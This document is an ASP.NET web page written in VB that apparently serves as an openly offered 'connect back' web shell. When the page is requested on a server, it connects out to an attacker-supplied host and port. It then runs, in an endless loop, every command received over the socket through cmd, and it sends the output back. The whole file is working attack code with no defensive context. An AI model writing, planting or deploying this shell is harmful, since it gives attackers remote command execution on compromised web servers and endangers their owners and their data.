<%@ Page Language="VB" %> <%@ import namespace="System" %> <%@ import namespace="System.Net" %> <%@ import Namespace="System.Net.Sockets" %> <% ' Grayscale Research ASP.NET Connect Back Shell ' Usage: http://hostmachine.com/cb.aspx?host=192.168.1.1&port=44510 ' Create Host and Port Variables (from get string) Dim host As String = Request.QueryString("host") Dim port As String = Request.QueryString("port") If Request.QueryString("host") = Nothing Then Response.End() Else ' Assign Host host = Request.QueryString("host") Response.Write("Using Host: " & host & "
") If Not Request.QueryString("port") = Nothing Then 'Assign Port port = Request.QueryString("port") Response.Write("Using Port: " & port & "
") Else port = "44510" Response.Write("Using Default Port: " & port & "
") End If End If ' Create a real Integer Port for use below Dim realPort As Integer = Val(port) ' Host Entry List Dim hEntry As IPHostEntry = Nothing hEntry = Dns.GetHostEntry(host) Dim address As IPAddress Dim s As Socket = Nothing ' Loop Suggested by MS For Each address In hEntry.AddressList Dim endPoint As New IPEndPoint(address, port) Dim tempSocket As New Socket(endPoint.AddressFamily, SocketType.Stream, ProtocolType.Tcp) ' Attempt Connection tempSocket.Connect(endPoint) ' Verify Connection If tempSocket.Connected Then s = tempSocket Exit For End If Next address If Not s.Connected Then Response.Write("
Could not create connection.
") Response.End() End If ' forever command and execute loop Dim ascii As Encoding = Encoding.ASCII Dim recvBuff(65535) As [Byte] Dim sendBuff() As [Byte] sendBuff = ascii.GetBytes("Grayscale ASP Connect back Shell Utility: 1.1 ") s.Send(sendBuff, sendBuff.Length, 0) Dim execCommand As String execCommand = "dir" Dim process As New System.Diagnostics.Process process.StartInfo.UseShellExecute = False process.StartInfo.RedirectStandardOutput = True process.StartInfo.FileName = "cmd" process.StartInfo.Arguments = "/c " & execCommand process.StartInfo.CreateNoWindow = True process.Start() sendBuff = ascii.GetBytes(process.StandardOutput.ReadToEnd) s.Send(sendBuff, sendBuff.Length, 0) Dim recvByteCount As Integer ' Main Shell Loop While 1 sendBuff = ascii.GetBytes("COMMAND>") s.Send(sendBuff, sendBuff.Length, 0) ' Main Command Loop recvByteCount = s.Receive(recvBuff, recvBuff.Length, 0) execCommand = Encoding.ASCII.GetString(recvBuff, 0, recvByteCount) process = New System.Diagnostics.Process process.StartInfo.UseShellExecute = False process.StartInfo.RedirectStandardOutput = True process.StartInfo.FileName = "cmd" process.StartInfo.Arguments = "/c " & execCommand process.StartInfo.CreateNoWindow = True sendBuff = ascii.GetBytes(process.StartInfo.FileName & process.StartInfo.Arguments) s.Send(sendBuff, sendBuff.Length, 0) process.Start() sendBuff = ascii.GetBytes(process.StandardOutput.ReadToEnd) s.Send(sendBuff, sendBuff.Length, 0) End While ' Never really gets here s.Close() %>